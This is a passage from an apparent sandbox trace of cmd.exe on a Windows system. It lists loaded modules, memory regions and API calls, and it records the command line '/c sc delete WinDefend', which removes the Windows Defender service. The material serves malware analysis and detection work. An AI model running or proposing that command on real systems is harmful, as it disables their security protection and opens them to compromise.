"\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3055 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3056 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3057 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 3058 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3059 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 3060 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 3061 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3062 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3063 start_va = 0x460000 end_va = 0x5e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 3064 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3065 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3066 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3067 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3068 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 3069 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3070 start_va = 0x5f0000 end_va = 0x770fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 3071 start_va = 0x780000 end_va = 0x1b7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 3072 start_va = 0x1b80000 end_va = 0x1ec2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 3142 start_va = 0x1ed0000 end_va = 0x219efff entry_point = 0x1ed0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 149 os_tid = 0x5f0 [0140.490] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x45fe24 | out: lpSystemTimeAsFileTime=0x45fe24*(dwLowDateTime=0xf3301240, dwHighDateTime=0x1d48db2)) [0140.490] GetCurrentProcessId () returned 0x600 [0140.490] GetCurrentThreadId () returned 0x5f0 [0140.490] GetTickCount () returned 0x2ebd4 [0140.490] QueryPerformanceCounter (in: lpPerformanceCount=0x45fe1c | out: lpPerformanceCount=0x45fe1c*=1820811300000) returned 1 [0140.491] GetModuleHandleA (lpModuleName=0x0) returned 0x4a090000 [0140.491] __set_app_type (_Type=0x1) [0140.491] __p__fmode () returned 0x75ab31f4 [0140.491] __p__commode () returned 0x75ab31fc [0140.491] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0b21a6) returned 0x0 [0140.491] __getmainargs (in: _Argc=0x4a0b4238, _Argv=0x4a0b4240, _Env=0x4a0b423c, _DoWildCard=0, _StartInfo=0x4a0b4140 | out: _Argc=0x4a0b4238, _Argv=0x4a0b4240, _Env=0x4a0b423c) returned 0 [0140.491] GetCurrentThreadId () returned 0x5f0 [0140.491] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5f0) returned 0x60 [0140.491] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000 [0140.491] GetProcAddress (hModule=0x76220000, lpProcName="SetThreadUILanguage") returned 0x7624a84f [0140.491] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.492] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.492] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x45fdb4 | out: phkResult=0x45fdb4*=0x0) returned 0x2 [0140.492] VirtualQuery (in: lpAddress=0x45fdeb, lpBuffer=0x45fd84, dwLength=0x1c | out: lpBuffer=0x45fd84*(BaseAddress=0x45f000, AllocationBase=0x360000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.492] VirtualQuery (in: lpAddress=0x360000, lpBuffer=0x45fd84, dwLength=0x1c | out: lpBuffer=0x45fd84*(BaseAddress=0x360000, AllocationBase=0x360000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.492] VirtualQuery (in: lpAddress=0x361000, lpBuffer=0x45fd84, dwLength=0x1c | out: lpBuffer=0x45fd84*(BaseAddress=0x361000, AllocationBase=0x360000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.492] VirtualQuery (in: lpAddress=0x363000, lpBuffer=0x45fd84, dwLength=0x1c | out: lpBuffer=0x45fd84*(BaseAddress=0x363000, AllocationBase=0x360000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.492] VirtualQuery (in: lpAddress=0x460000, lpBuffer=0x45fd84, dwLength=0x1c | out: lpBuffer=0x45fd84*(BaseAddress=0x460000, AllocationBase=0x460000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0140.492] GetConsoleOutputCP () returned 0x1b5 [0140.492] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0140.492] SetConsoleCtrlHandler (HandlerRoutine=0x4a0ae72a, Add=1) returned 1 [0140.492] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.492] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.492] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.493] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0b41ac | out: lpMode=0x4a0b41ac) returned 1 [0140.493] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.493] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.493] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.493] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0b41b0 | out: lpMode=0x4a0b41b0) returned 1 [0140.493] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.493] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.493] GetEnvironmentStringsW () returned 0x231f50* [0140.493] FreeEnvironmentStringsW (penv=0x231f50) returned 1 [0140.494] GetEnvironmentStringsW () returned 0x231f50* [0140.494] FreeEnvironmentStringsW (penv=0x231f50) returned 1 [0140.494] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x45ed24 | out: phkResult=0x45ed24*=0x68) returned 0x0 [0140.494] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x45ed2c, lpData=0x45ed30, lpcbData=0x45ed28*=0x1000 | out: lpType=0x45ed2c*=0x0, lpData=0x45ed30*=0x0, lpcbData=0x45ed28*=0x1000) returned 0x2 [0140.494] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x45ed2c, lpData=0x45ed30, lpcbData=0x45ed28*=0x1000 | out: lpType=0x45ed2c*=0x4, lpData=0x45ed30*=0x1, lpcbData=0x45ed28*=0x4) returned 0x0 [0140.494] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x45ed2c, lpData=0x45ed30, lpcbData=0x45ed28*=0x1000 | out: lpType=0x45ed2c*=0x0, lpData=0x45ed30*=0x1, lpcbData=0x45ed28*=0x1000) returned 0x2 [0140.494] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x45ed2c, lpData=0x45ed30, lpcbData=0x45ed28*=0x1000 | out: lpType=0x45ed2c*=0x4, lpData=0x45ed30*=0x0, lpcbData=0x45ed28*=0x4) returned 0x0 [0140.494] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x45ed2c, lpData=0x45ed30, lpcbData=0x45ed28*=0x1000 | out: lpType=0x45ed2c*=0x4, lpData=0x45ed30*=0x40, lpcbData=0x45ed28*=0x4) returned 0x0 [0140.494] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x45ed2c, lpData=0x45ed30, lpcbData=0x45ed28*=0x1000 | out: lpType=0x45ed2c*=0x4, lpData=0x45ed30*=0x40, lpcbData=0x45ed28*=0x4) returned 0x0 [0140.494] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x45ed2c, lpData=0x45ed30, lpcbData=0x45ed28*=0x1000 | out: lpType=0x45ed2c*=0x0, lpData=0x45ed30*=0x40, lpcbData=0x45ed28*=0x1000) returned 0x2 [0140.494] RegCloseKey (hKey=0x68) returned 0x0 [0140.494] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x45ed24 | out: phkResult=0x45ed24*=0x68) returned 0x0 [0140.494] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x45ed2c, lpData=0x45ed30, lpcbData=0x45ed28*=0x1000 | out: lpType=0x45ed2c*=0x0, lpData=0x45ed30*=0x40, lpcbData=0x45ed28*=0x1000) returned 0x2 [0140.494] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x45ed2c, lpData=0x45ed30, lpcbData=0x45ed28*=0x1000 | out: lpType=0x45ed2c*=0x4, lpData=0x45ed30*=0x1, lpcbData=0x45ed28*=0x4) returned 0x0 [0140.494] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x45ed2c, lpData=0x45ed30, lpcbData=0x45ed28*=0x1000 | out: lpType=0x45ed2c*=0x0, lpData=0x45ed30*=0x1, lpcbData=0x45ed28*=0x1000) returned 0x2 [0140.494] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x45ed2c, lpData=0x45ed30, lpcbData=0x45ed28*=0x1000 | out: lpType=0x45ed2c*=0x4, lpData=0x45ed30*=0x0, lpcbData=0x45ed28*=0x4) returned 0x0 [0140.494] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x45ed2c, lpData=0x45ed30, lpcbData=0x45ed28*=0x1000 | out: lpType=0x45ed2c*=0x4, lpData=0x45ed30*=0x9, lpcbData=0x45ed28*=0x4) returned 0x0 [0140.494] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x45ed2c, lpData=0x45ed30, lpcbData=0x45ed28*=0x1000 | out: lpType=0x45ed2c*=0x4, lpData=0x45ed30*=0x9, lpcbData=0x45ed28*=0x4) returned 0x0 [0140.495] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x45ed2c, lpData=0x45ed30, lpcbData=0x45ed28*=0x1000 | out: lpType=0x45ed2c*=0x0, lpData=0x45ed30*=0x9, lpcbData=0x45ed28*=0x1000) returned 0x2 [0140.495] RegCloseKey (hKey=0x68) returned 0x0 [0140.495] time (in: timer=0x0 | out: timer=0x0) returned 0x5c09a272 [0140.495] srand (_Seed=0x5c09a272) [0140.495] GetCommandLineW () returned="/c sc delete WinDefend" [0140.495] GetCommandLineW () returned="/c sc delete WinDefend" [0140.495] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0b5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.495] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x231f58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0140.495] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.495] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.495] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.495] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.495] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.495] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.495] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.495] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.495] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.495] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.495] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.495] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.496] GetEnvironmentStringsW () returned 0x232168* [0140.496] FreeEnvironmentStringsW (penv=0x232168) returned 1 [0140.496] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.496] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.496] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.496] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.496] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.496] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.496] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.496] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.496] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.496] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.496] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x45faf0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x45faf0, lpFilePart=0x45faec | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x45faec*="system32") returned 0x13 [0140.496] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0140.496] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x45f86c | out: lpFindFileData=0x45f86c) returned 0x2207f0 [0140.496] FindClose (in: hFindFile=0x2207f0 | out: hFindFile=0x2207f0) returned 1 [0140.497] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x45f86c | out: lpFindFileData=0x45f86c) returned 0x2207f0 [0140.497] FindClose (in: hFindFile=0x2207f0 | out: hFindFile=0x2207f0) returned 1 [0140.497] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0140.497] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0140.497] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0140.497] GetEnvironmentStringsW () returned 0x232168* [0140.497] FreeEnvironmentStringsW (penv=0x232168) returned 1 [0140.497] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0b5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.497] GetConsoleOutputCP () returned 0x1b5 [0140.575] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0140.575] GetUserDefaultLCID () returned 0x409 [0140.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a0b4950, cchData=8 | out: lpLCData=":") returned 2 [0140.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x45fc30, cchData=128 | out: lpLCData="0") returned 2 [0140.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x45fc30, cchData=128 | out: lpLCData="0") returned 2 [0140.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x45fc30, cchData=128 | out: lpLCData="1") returned 2 [0140.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a0b4940, cchData=8 | out: lpLCData="/") returned 2 [0140.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a0b4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a0b4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a0b4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a0b4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a0b4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a0b4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.576] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a0b4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.576] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a0b4930, cchData=8 | out: lpLCData=".") returned 2 [0140.576] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a0b4920, cchData=8 | out: lpLCData=",") returned 2 [0140.576] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.577] GetConsoleTitleW (in: lpConsoleTitle=0x221030, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.577] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000 [0140.577] GetProcAddress (hModule=0x76220000, lpProcName="CopyFileExW") returned 0x76253b92 [0140.577] GetProcAddress (hModule=0x76220000, lpProcName="IsDebuggerPresent") returned 0x76234a5d [0140.577] GetProcAddress (hModule=0x76220000, lpProcName="SetConsoleInputExeNameW") returned 0x7624a79d [0140.578] _wcsicmp (_String1="sc", _String2=")") returned 74 [0140.578] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0140.578] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0140.578] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0140.578] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0140.578] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0140.578] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0140.579] GetConsoleTitleW (in: lpConsoleTitle=0x45f928, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.579] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0140.579] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0140.579] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0140.579] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0140.579] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0140.579] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0140.579] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0140.579] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0140.579] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0140.579] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0140.579] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0140.580] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0140.580] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0140.580] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0140.580] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0140.580] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0140.580] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0140.580] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0140.580] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0140.580] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0140.580] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0140.580] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0140.580] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0140.580] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0140.580] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0140.580] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0140.580] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0140.580] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0140.580] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0140.580] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0140.580] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0140.580] _wcsicmp (_String1="sc", _String2="START") returned -17 [0140.580] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0140.580] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0140.580] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0140.580] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0140.580] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0140.580] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0140.580] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0140.580] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0140.580] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0140.580] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0140.580] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0140.580] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0140.580] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0140.580] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0140.580] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0140.580] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0140.580] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0140.580] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0140.580] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0140.580] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0140.581] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0140.581] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0140.581] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0140.581] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0140.581] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0140.581] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0140.581] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0140.581] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0140.581] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0140.581] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0140.581] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0140.581] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0140.581] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0140.581] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0140.581] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0140.581] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0140.581] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0140.581] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0140.581] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0140.581] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0140.581] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0140.581] _wcsicmp (_String1="sc", _String2="START") returned -17 [0140.581] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0140.581] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0140.581] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0140.581] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0140.581] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0140.581] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0140.581] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0140.581] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0140.581] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0140.581] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0140.581] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0140.581] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0140.581] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0140.582] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0140.582] SetErrorMode (uMode=0x0) returned 0x0 [0140.582] SetErrorMode (uMode=0x1) returned 0x0 [0140.582] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x234cb8, lpFilePart=0x45f448 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x45f448*="system32") returned 0x13 [0140.582] SetErrorMode (uMode=0x0) returned 0x1 [0140.582] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.582] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0140.587] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.589] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.589] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x45f1c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45f1c4) returned 0x234f80 [0140.589] FindClose (in: hFindFile=0x234f80 | out: hFindFile=0x234f80) returned 1 [0140.589] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x45f1c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45f1c4) returned 0xffffffff [0140.589] GetLastError () returned 0x2 [0140.589] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x45f1c4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x45f1c4) returned 0x234f80 [0140.590] FindClose (in: hFindFile=0x234f80 | out: hFindFile=0x234f80) returned 1 [0140.590] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0140.590] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0140.590] GetConsoleTitleW (in: lpConsoleTitle=0x45f6bc, nSize=0x104 | out: 